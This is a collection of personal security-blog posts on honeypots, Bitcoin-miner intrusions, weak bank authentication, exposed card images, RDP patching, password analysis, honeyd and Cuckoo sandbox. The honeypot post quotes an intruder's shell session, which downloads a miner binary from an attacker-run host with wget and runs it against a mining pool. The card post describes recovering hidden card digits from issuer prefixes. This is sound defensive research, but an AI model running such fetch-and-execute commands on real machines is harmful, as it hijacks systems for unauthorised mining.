Tales from the Honeypot: Bitcoin miner

My Kippo farm has been largely retired as most of the captured sessions where becoming stale and ‘samey’. Thankfully however, I’ve still been getting daily reports thanks to this script (now available in BitBucket repo) and this morning something new caught my attention – a ‘guest’ attempted to turn the compromised machine into a BitCoin miner.
For anyone living under a rock for the last few months, Bitcoin is the first of a new breed of ‘crypto-currency’; essentially a decentralised monetary format with no geographical (or regulatory) boundaries. If you need a refresher, a good basic guide is here if you want to get up to speed.
Our guest connected from an IP address that hasn’t appeared in the honeypot logs previously; whilst the password on the root account is (intentionally) weak, I still find it unlikely that our guest got lucky on the very first attempt. Suspicions at this point are that either the compromised machine was identified as part of a previous compromise; anyone that has run a SSH honeypot for any length of time will be aware that attackers frequently attempt to use compromised machines to scan for other vulnerable victims and that successful rogue log-ins also often disconnect immediately – my assumption has always been that this is nothing more than automated scanners identifying and confirming valid credentials before reporting the system details back to their master for manual follow-up. It is also possible that this particular guest acquired a list of pre-identified vulnerable systems as a foundation for future activities.
How our guest found their way to the system is, unfortunately, pure speculation and for the purposes of this analysis largely irrelevant; what is more interesting is what they chose to do once access was gained. After (very) briefly looking around, and failing to determine the presence of the honeypot a 64-bit, bitcoin miner is downloaded. Details, for those that want to play along from home:

  • Location (live at time of writing, browser beware) – http://orfeous.hu/btc/minerd64
  • MD5sum – 007471071fb57f52e60c57cb7ecca6c9 (VirusTotal)

Once downloaded, the guest attempts to run the binary with the following parameters:

  • -a sha256d –url=stratum+tcp://stratum.bitcoin.cz:3333 –userpass=orfeousb.vps:qwertz1234chmod +x minerd64

It appears that the guest has little experience with falling foul to a honeypot; when running the binary fails he (or she) downloads the same file, from the same location and attempts to execute the miner a second time. When this fails the guest simply exits the system (after being briefly fooled by Kippo’ “localhost” trick on exit.
Those paying attention will notice the link between both the domain and the mining pool username; this leads me to believe that the miner is downloaded from the attackers own system, not a compromised system subverted for this purpose. Whois records indicate that the domain was first registered July 2013 by a private registrant, include both name and address (redacted until verified).
Given the £-value involved with crypto-currency at present it should be no surprise that enterprising criminals are attempting to cash-in on the bandwagon, with hindsight I’d be more surprised if they didn’t seek to use compromised systems to add to their own mining pool(s, username ‘orfeousb‘ suggests the potential for multiple accounts). I’m someone surprised it has taken until now to be noticed. Brief research (ok, Google-fu) tonight indicates that the minerd64 binary has been a present in active attacks since at least the turn of this year, albeit relying on a different compromise vector (Zimbra compromise), and VirusTotal shows that the exact binary has been seen in the wild since at least March 2014.
The change in attack scenario appears to possibly be part of a wider campaign, as well as this session I’m aware of a similar session taking place on another Kippo honeypot within the last 48hrs, again with connections to .hu systems.
How much this campaign has netted the pool owner(s) to this point is anyone’s guess, where there is profit there will be criminals so I doubt this will be the last we see of similar attack patterns.
Until next time, happy honeypotting.

Andrew
P.S. For the curious, all shell interaction during the compromise:

ls -l
history
ls -l /home
cd /home/<redacted>
ls -l
cd ..
cd ..
uname -a
ls -l
wget http://orfeous.hu/btc/minerd64
./minerd64 -a sha256d –url=stratum+tcp://stratum.bitcoin.cz:3333 –userpass=orfeousb.vps:qwertz1234chmod +x minerd64
ls -l
chmod +x minerd64
ls -l
cd /root
wget http://orfeous.hu/btc/minerd64
chmod +x minerd64
ls -l
./minerd64
exit
sadas
ifconfig
ls -l
chmod minerd64
ls -l
exit
exit

Ranting at the youth

Since graduating back in 2006 I’ve been honoured by Northumbria University by being asked to return and speak with their students with the hindsight of having spent time out in industry, I covered my last trip here. So when I got an email at the tail end of last year I didn’t think twice in agreeing; though in hindsight I should have asked more questions, previous sessions have been 15minute slots, this time around I was booked in for 2 HOURS!, after I’d already agreed. – Think I nearly fainted at that point.

Thankfully one thing I’ve never had a problem with is telling war-stories, anecdotes and lessons learned. As the Uni were looking for real world experience this seemed ideal so I based the presentation around incidents I’ve encountered and (hopefully) help others learn from my experiences. For anyone willing to follow along at home the slide deck can be found here, though I doubt it’s particularly useful as the slides were more memory jogs for me, than actually useful information.

As I was unsure how long I’d be able to talk for (anyone that has seen me talk previously will know I can get rather, speedy, as I get excited) I setup a lab environment to demo some of the technologies discussed, honeypots – no surprises there. The plan was that the lab could expand and fill whatever time was left in the session after I ran out of slides. At least that was the plan; as it happens the content generated sufficient levels of debate, interest and questions that I managed to fill the whole slot and even overrun slightly with some Q&A after the event.

Remembering my experience on the other side of the divide, bored stiff listening to those in the ‘real world’ whilst at Uni caused me plenty of trepidation for the last couple of weeks that I’d be wasting everyone’s time. So I was delighted to (nervously) check my twitter feed after the session closed, to find several messages with positive feedback in my timeline; taking a leap that all the students weren’t just being polite the session seems to have been a success and of some benefit. Adding this to the usual buzz I gain after public speaking in general I’m currently a very happy geek.

Many thanks to Northumbria University for extending the invitation in the first place, and for Onyx Group’s continued understanding and flexibility to enable me the time to get involved with this and similar activities – not all profit is commercial.


Andrew Waite

Stupidity, begets stupidity – and no security

I realised whilst at work today that my credit card wasn’t in my wallet, after hoping against hope that it would be in yesterday’s trouser pocket when I got home I had to accept that it was lost. Far from the brightest thing I’ve done today, especially given the time of year. So I did the sensible thing and called the card provider to cancel the card.
The number I called was listed as being for (admittedly amongst other things) reporting lost or stolen cards; first question the automated ask was my card number, which I didn’t have; regardless I quickly got through to a person who (I’ll be fair) handled my problem with speed and minimal fuss.
Whilst finding my account without the card number I was asked to confirm my date of birth; once the correct account was identified I was asked a couple of security questions to confirm I was me; all very normal and acceptable. However the second question asked how old I will be come my next birthday; apart from the fact that this is hardly the most protected of information, had I been a fraudulent caller trying to maliciously access someone else’s account I had already correctly provided D.o.B. not 2 minutes earlier; not exactly difficult to extrapolate one from the other.
To be honest, I didn’t worry too much; some of the other security questions were likely sufficiently detailed to limit the chance of someone else getting past the gatekeepers. But being a sarcastic and (hopefully) helpful sort of bloke I jumped on twitter to suggest that asking a ‘security’ question based off a wildly known and shared piece of unchangeable information probably wasn’t the best of ideas.
THIS is where I really started getting concerned, the whole conversation can be read here (Barclays twitter people, I have screengrabs for prosperity if you feel like deleting any of the responses…..).
Some of my favourites:

Unfortunately, we’re unable to confirm what security questions will be asked when you call one of our teams

I wasn’t asking what questions I would need the answers to, but pointing out the questions I was asked weren’t exactly the most robust. Either way, security via obscurity isn’t security, and if knowing the types of questions to be asked really does make accounts vulnerable and I was a fraudster; I’d simply have a number of like minded miscreants call up several times until the pool of potential questions was exhausted….

We only ask questions in which the genuine account holder should know the answer to.

This is the point that tipped me over the edge, if I need to explain to anyone why believing only the genuine account holder knows their date of birth, I’ve got a bridge I want to sell you. (hint if needed: Do you get cards/presents from those that know you the same time every year?).
Admittedly, at this point I got a bit ‘unprofessional’ and suggested I was either being fobbed off, or Barclays (twitter handler)’ security knowledge is inept, I’m assuming this ‘abuse’ may be the reason I’ve had no further response.
I really hope that this incident is the result of the individual handling the conversation being out of their depth and having an inadequate script to follow. If not, and this is indicative of Barclays security provisions (and someone, somewhere had to OK the question being used in the first place) I need to reconsider where I bank….
–Andrew Waite
P.S. I have no evidence, but I’m getting a creeping felling of deja vu that I’ve had a similar telephone authentication process, and a similar discussion on twitter as to whether this is a good idea

Online Bank Cards

The reaction most people have when you point out people are naive enough to post pictures of credit and debit cards online is to laugh, surely no one could be that unaware of the risks. But the fact is that the situation has become that common place that a number of Twitter accounts have been set-up to automatically identify and repost the images.
Some, like @CancelThatCard/http://cancelthat.cc/ attempt to show the posters the error of their ways, while others merely highlight the posts and request that people “Please quit posting pictures of your debit cards”.
As an example (and as proof for those that don’t believe me), the latest image in the @needadebitcard feed at time of writing:

https://twitter.com/Nestorghh/status/331793025019813888/photo/1
Yes, people do post their cards online…..

As a side note, it looks like Twitter is stamping down on the practice of highlighting these posts, the last message posted by @cancel thatcard on April 14th indicate that the service has essentially been censored. I hope Twitter reverse this, providing security information to end-users is not something that should be prevented.
I’ve been following both accounts for sometime; at first my reaction to that I’ve discussed above, having a laugh at the expense of those who don’t recognise the security implications of their actions. As time went by I started messaging the accounts posting their cards to further highlight the error; this didn’t have the impact I was expecting, instead of thanks for providing free advice it more regularly resulted in insults, abuse and full denial that there was any risk imposed.
Recently I came across an image of a card where the owner had attempted to obscure part of the card number and name; smart. Not so smart was that it was the first 5 digits of the 16 digit card number that was obscured. It’s little known, and wasn’t to me until I started following these cards in more depth, is that the first 6 digits don’t identify the account or card holder, but the bank that issued the card. In this case the poster was so helpful to identify the card as a personalised BarclayCard. A quick Google search lead to this page, which knowing the 6th digit of the card lead to the fact that the missing digits could only be one of two possibilities, reducing the potential entropy gained from obscuring part of the card from ~10k possible numbers to two possible card numbers, effectively posting the entire 16 digits online.
In the above example, which is far from uncommon, when suggesting the owner may want to remove the image and cancel the card the response was one of confusion, with no understanding of the risk. Despite further information and links, the image is still online (I have no way of knowing if the card has been cancelled).
To end I’ll echo the plea from @needadebit card: Please quit posting pictures of your cards people.
— Andrew Waite
P.S. I’ve not identified any of the examples directly in this post, but I’ve also not cleared any of the conversations from my Twitter time-line if anyone is interested enough to search. If people post pictures of their account details online, and then don’t remove the same information once several people highlight the stupidity then, well, me deleting a couple of Twitter posts aren’t going to improve their security.

New Download Sources

I’ve been meaning to tidy up some of my older older scripts for some time, and as a colleague recently pointed me in the direction of BitBucket for free hosting of source code repositories this gave me the kick I’d been looking for.
The result is my newly created BitBucket account, I’ve released a public repository containing my older scripts: MinorScripts.

MinorScripts repository
MinorScripts repository

Going forwards, I’ve got some half-implemented projects and plenty of ideas which I’m hoping to release as full-blown projects. As they say: watch this space.
— Andrew Waite

ms12-020 mitigations

This week has been an interesting one for followers of the info-sec arena. On Tuesday Microsoft released a patch and security bulletin for MS12-020 for a critical flaw in remote desktop protocol, allowing for remote code execution without the need to authenticate to the target system first. Since the patch was released the good, the bad and the ugly of infosec have been attempting to reverse engineer the patch to develop a functional exploit; and over the last 24hrs PoC code has started to become publicly available.
As a result, the SANS Internet Storm Centre has raised their InfoCon threat level to Yellow. This is because weaponised versions of functional exploit code are expected over the coming days and weeks, with past experience making it likely that the exploit will be linked to worm capabilities for automated propagation.
So, the sky is falling right? Not as much as the furore would have you believe. Despite this does have the potential to become a well known, well exploited and long running bug; it is defensible with solid practices in play.

  1. Turn it off: If you don’t need RDP (or any port/service for that matter), turn it off. Reduces the attack vector against known or unknown weaknesses in the service
  2. Patch it: Microsoft released a patch of the weakness on Tuesday BEFORE exploit code was widely publicly available. You should be patching systems as standard operations; if you’re not, no would be a good time to catch up and remove the oversight.
  3. Limit access: If you can’t turn the service off because you need it, does it need to be available to world? If not restrict access to trusted source locations only via either perimeter or host based firewalling (or both). It doesn’t remove the threat completely, but it should severely reduce the risk if you’re not accepting connections from any machine on the internet. Only allowing access to the port via a VPN connection would also reduce the ability of a malicious source to connect to the service.
  4. (Bonus Point) Logging: Make sure you keep a close eye on your system logs; if you do get compromised, the damage could be limited if you can identify and respond to the breach promptly.

I’ve enjoyed watching the action this week, and the potential fallout has the potential to be more interesting still; but you should be able to prevent your systems from become part of a large statistic of low-hanging fruit with a few easy or common steps to securing your environment against the threat.
–Andrew Waite

echo "fat" | sed s/a/i

More of a personal post this time; the post title(*) is about as geeky as it gets, if you’re only here for the tech then you may want to skip this one 🙂
I’m a geek (no surprises there), and thanks to too many hours hunched of the keyboard in the dark coding away into the small hours I’ve come to resemble the stereotype; overweight, four-eyed and (preferably) in black. I always assumed that this was me, and was happy with that; but towards the end of last summer there appeared to be an increase in geeks and hacker-types pushing to get fitter: Hackerrun came and went, and a couple of my clients participated in a local 10k run. So I thought I’d see what all the fuss was about and join in.
Running
At the time I came across the Couch to 5k program, which claims to be a nine week training program that will take you from zero fitness to being able to run 5k. Three workouts a week, no more than 30minutes a workout; even I can find time to squeeze that into my routine when I try to. I can definitely vouch for the zero fitness aspect of the program, the very first workout has you running for only one minute at a time (and who can’t run for a minute?). Well, it turned out I couldn’t…..
I’m still not running 5k yet despite being training for more than nine weeks, but I’m definitely getting there and I’m now completing training sessions that would have killed me 6 months ago without complaint.
Strength
Running has been going well, but I wanted to round out my training to get stronger as well as fitter; but as I don’t have room at home for large and expensive weight machines and don’t want to get locked into paying a gym for the next 12months or more I was struggling to find a way to incorporate this, until I came across the 100 pushup challenge.
The theory and training programme are similar to c25k, which I’m already comfortable with, follow a training plan and in eight weeks you’ll be able to do 100 consecutive pushups. Starting with an initial strength test of ‘how many pushups can you do without collapsing’ (I managed a meagre 6) you find a column on the training programme, and again have three workouts a week. This takes even less time than the 30minutes needed for the running sessions, I completed each of the week 1 sessions in ~5minutes each.
I only completed the last workout session of week 1 this morning, and already I managed a total of 44 pushups, with my last set being 12; twice what I was capable of at the start of the week. How’s that for progress?
IT Angle?
So, why am I sharing this? For one, I’m hoping that by throwing the fact that I’m training out in the public domain I’ll generate some peer pressure to keep going. It’s harder to stop if you have to explain to everyone why you’ve gone back to being lazy and unfit. Secondly, I wanted to share some of the apps, tech and services I’ve used so far in the hope it might help someone else.
I track all of my runs (and longer dog walking sessions) with RunKeeper. With the Runkeeper app on any GPS enabled smartphone it will track your route and pace of any run. Personally I find having stats, maps and other geekery tracking my progression helps keep my attention overtime. It’s also very simple to program the c25k workouts into runkeeper so your phone will beep when you’ve reach the time to switch between running and walking. Security warning: runkeeper doesn’t enforce HTTPS at login or elsewhere on the site, make sure your protected when you connect.
One word of caution, I found the GPS antenna on my phone becoming flaky so I recently upgraded to a dedicated sports watch, Garmin Forerunner 110. Not cheap, but still far cheaper than my outlay would have been if I was pounding the treadmill in a gym rather than the pavement for free.
On the pushup front, I’ve been using the Stronger app for tracking strength training and integrates nicely with RunKeeper to keep everything in the same place. The app works well, but I’ve found it to be ssssllllllloooooowwwwwwww at times.
Peer pressure time; if you’re a RunKeeper user my profile is here, feel free join my street team. If you’re not a RunKeeper user you can still use the same link to track my training progress and give me a friendly kick if I stop being active 😉
Never thought I’d say this, but I’m actually enjoying doing physical exercise now. And losing 10% of my starting body weight so far doesn’t hurt either; if I can do it, anyone can.
–Andrew Waite
(*) for the none ‘nix geeks reading this, the post title is a Bash one-liner. With the sed command changing the eventual output from fat to fit…..

Pipal password analysis of Kippo password useage

Pipal is a tool for quickly and easily analysing password trends across many passwords, created by @digininja and @n00bz. Install (such as it is) is a straightforward affair; download, unpack, run. Standard usage is equally straightforward; ./pipal.rb ;
Download Pipal from here
I’ve not had too much opportunity run the tool myself, as Robin has been quick to release the results of Pipal’s analysis whenever a new breach has been made publicly available, results of this analysis can be found here.
So, trying to find an opportunity to give Pipal a run out, I decided to take a look at the passwords gathered by my Kippo installation. First up, I decided to take a look at the passwords used with added accounts once intruders compromise the system. Curious to see if the passwords chosen by those that break systems are vulnerable to the same weaknesses of standard users. This password list is quite short, so I’ll just add below:

  • zmxncbv
  • martin4e
  • sanja123hack
  • i123456
  • sistem123q
  • madaucusania
  • zaq12ws34edc
  • 3rwin89
  • b3s3mn0gumala
  • mylove120
  • zipp3r21
  • 19U!&u178
  • sor123in

The full results of this analysis is available here.
Pipal’s output from the analysis can be found here. I was surprised with some of the findings, >;60% of the passwords were 8 characters or less, many based on dictionaries words and only one utilising non-alphanumeric characters. Considering the people choosing these passwords gained access to the server by taking advantage of weak root password, I’d really expect better awareness of the importance of generating strong passwords. Guess not…..
Next up, I wanted to take a look at the passwords that are being used by bruteforce and scanning attempts to gain access to the honeypot installation. This password list is far longer than the list above, totalling 382374 entries. The full list input file is available here, and was generating by running the below SQL query against Kippo’s database. For the purposes of this analysis I decided to ignore authentication attempts that use blank passwords, but for the curious, attempts with passwords number 244062 attempts.

select count(password) from auth where password ;””;

For those not familiar with Kippo, it’s worth noting that it’s default root password (which I stuck with for this analysis) is ‘123456’, this will definitely have had an impact on the results below; partly because it features more prominently as attackers knowing the password confirm and utilise the the credentials, and bruteforce scanners will (may?) stop their attack once valid credentials are found, so that attempts which would have been made after ‘123456’ are not seen by the Kippo sensor.
The full output from Pipal from this analysis can be found here. Whilst the advice is weaker than ‘best practice’ advice on creating secure passwords, this data set indicates that simply choosing a password with 10 or more characters will avoid more 80% of remote password cracking attempts (local, offline attacks will be a different matter so take with a pinch of salt.
From finally getting my hands dirty with Pipal it’s a great tool, that does exactly what it sets out to do; give the users the numbers, so they can tell the story of the dataset.
–Andrew

HoneyD network architecture

I was recently asked about the network configuration I use for my honeyd sensor. I had thought I’d already written about this so initially went to find the article on honeyd configuration; but my memory was wrong and the original post only covered configuring the guest systems, not the honeyd host itself. So, as I now have a pretty(ish) network diagram showing my setup I may as well correct the earlier omission.
<DISCLAIMER: This may not be the best network design for running honeyd, this is merely how my environment is configured and it works for me as a research platform. As usual, your mileage may vary, especially if your use-case differs from my own>

As can be seen, the design has three distinct network segments:

  • Publicly route-able IPs
  • Internal network for honeypot hosts
  • Virtual network for honeyd guest systems. These IP addresses sit on loopback interface on the host, with a static route on the firewall to pass all virtual traffic to the honeyd host.

Using a perimeter firewall with NAT/PAT capabilities allows easy switching between emulated systems and services if your public IP resources are limited; a large network of guests can be configured in advance and left static, then a quick firewall change is all that is required to expose different systems to the world.
Additionally, as much as honeypot systems are designed to be compromised and collect information of malicious attacks (or perhaps more correctly, because of this) , low-interaction systems like honeyd is designed to avoid full compromise. If something goes wrong and the host system gets fully compromised, a (sufficiently configured) perimeter firewall provides some control of outgoing traffic, limiting the attackers options for using the honeypot sensor to attack other systems.
Not much to it really; if you use an different setup and/or can suggest ways to improve the setup let me know, always looking to improve my systems where possible.
— Andrew Waite

Cuckoo Sandbox 101

It’s a while since I’ve found time to add a new tool to my malware environment, so when a ISC post highlighted a new update to Cuckoo sandbox it served as a good reminder that I hadn’t got around to trying Cuckoo, something that has now changed. For those that don’t know, from it’s own site:

[…] Cuckoo Sandbox is a malware analysis system.
Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment.
It’s mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine.

Considering Cuckoo is the combined product of several tools, mostly focused around VirtualBox, I found install and setup was largely trouble free, mostly thanks to the detailed installation instructions from the tools online documentation. I only encountered a couple of snags.
No VMs

[2011-12-29 17:21:56,470] [Core.Init] INFO: Started.
[2011-12-29 17:21:56,686] [VirtualMachine.Check] INFO: Your VirtualBox version is: “4.1.2_Ubuntu”, good!
[2011-12-29 17:21:56,688] [Core.Init] INFO: Populating virtual machines pool…
[2011-12-29 17:21:56,703] [VirtualMachine] ERROR: Virtual machine “cuckoo1” not found: 0x80bb0001 (Could not find a registered machine named ‘cuckoo1’)
[2011-12-29 17:21:56,704] [VirtualMachine.Infos] ERROR: No virtual machine handle.
[2011-12-29 17:21:56,705] [Core.Init] CRITICAL: None of the virtual machines are available. Please review the errors.

The online documentation specifies creating a dedicated user for the cuckoo process. Sound advice, but if you create your virtual guest machines under a different user (like I did, under a standard user account), then the cuckoo process cannot interact with the virtualbox guests. Either changing ownership of cuckoo, or specifically creating the guest VMs as the cuckoo user will solve the issue.
Creating Database
Last problem encountered was Cuckoo’s database, which if it doesn’t exist when the process will create a blank database. Which (obviously, in hindsight) will fail if the running user doesn’t have permissions to write to Cuckoo’s base directory.
cuckoo.py
With problems out of the way, Cuckoo runs quite nicely, with three main parts. the cuckoo.py script does the bulk of the heavy lifting and needs to be running before doing anything else. If all is well it should run through some initialisation and wait for further instructions:

/opt/cuckoo $ ./cuckoo.py
_
____ _ _ ____| | _ ___ ___
/ ___) | | |/ ___) |_/ ) _ \ / _ \
( (___| |_| ( (___| _ ( |_| | |_| |
\____)____/ \____)_| \_)___/ \___/ v0.3.1
www.cuckoobox.org
Copyright (C) 2010-2011
[2011-12-29 20:27:17,120] [Core.Init] INFO: Started.
[2011-12-29 20:27:17,719] [VirtualMachine.Check] INFO: Your VirtualBox version is: “4.1.2_Ubuntu”, good!
[2011-12-29 20:27:17,720] [Core.Init] INFO: Populating virtual machines pool…
[2011-12-29 20:27:17,779] [VirtualMachine.Infos] INFO: Virtual machine “cuckoo1” information:
[2011-12-29 20:27:17,780] [VirtualMachine.Infos] INFO: \_| Name: cuckoo1
[2011-12-29 20:27:17,781] [VirtualMachine.Infos] INFO: | ID: 9a9dddd8-f7d6-40ea-aed3-9a0dc0f30e79
[2011-12-29 20:27:17,782] [VirtualMachine.Infos] INFO: | CPU Count: 1 Core/s
[2011-12-29 20:27:17,783] [VirtualMachine.Infos] INFO: | Memory Size: 512 MB
[2011-12-29 20:27:17,783] [VirtualMachine.Infos] INFO: | VRAM Size: 16 MB
[2011-12-29 20:27:17,784] [VirtualMachine.Infos] INFO: | State: Saved
[2011-12-29 20:27:17,785] [VirtualMachine.Infos] INFO: | Current Snapshot: “cuckoo1_base”
[2011-12-29 20:27:17,785] [VirtualMachine.Infos] INFO: | MAC Address: 08:00:27:BD:9C:4F
[2011-12-29 20:27:17,786] [Core.Init] INFO: 1 virtual machine/s added to pool.

submit.py
The submit.py script is one of the ways for getting cuckoo to analysis files:

python submit.py –help
Usage: submit.py [options] filepath
Options:
-h, –help show this help message and exit
-t TIMEOUT, –timeout=TIMEOUT              Specify analysis execution time limit
-p PACKAGE, –package=PACKAGE           Specify custom analysis package name
-r PRIORITY, –priority=PRIORITY              Specify an analysis priority expressed in integer
-c CUSTOM, –custom=CUSTOM                 Specify any custom value to be passed to postprocessing
-d, –download                                                   Specify if the target is an URL to be downloaded
-u, –url                                                                Specify if the target is an URL to be analyzed
-m MACHINE, –machine=MACHINE          Specify a virtual machine you want to specifically use for this analysis

Most of the options above are self-explanatory, just make sure to select the relevant analysis package depending on what you’re working with; possibilities are listed here.
web.py
Finally, web.py provides a web interface for reviewing the results of all analysis performed by cuckoo, bound to localhost:8080.
I’d like to thank the team that developed and continue to develop the cuckoo sandbox. I look forward to getting more automated results going forward and hopefully getting to a point where I’m able to add back to the project; until then I’d recommend getting your hands dirty, from my initial experiments I doubt you’ll be disappointed. But if you won’t take my word for it, watch Cuckoo in action analysing Zeus here.
— Andrew Waite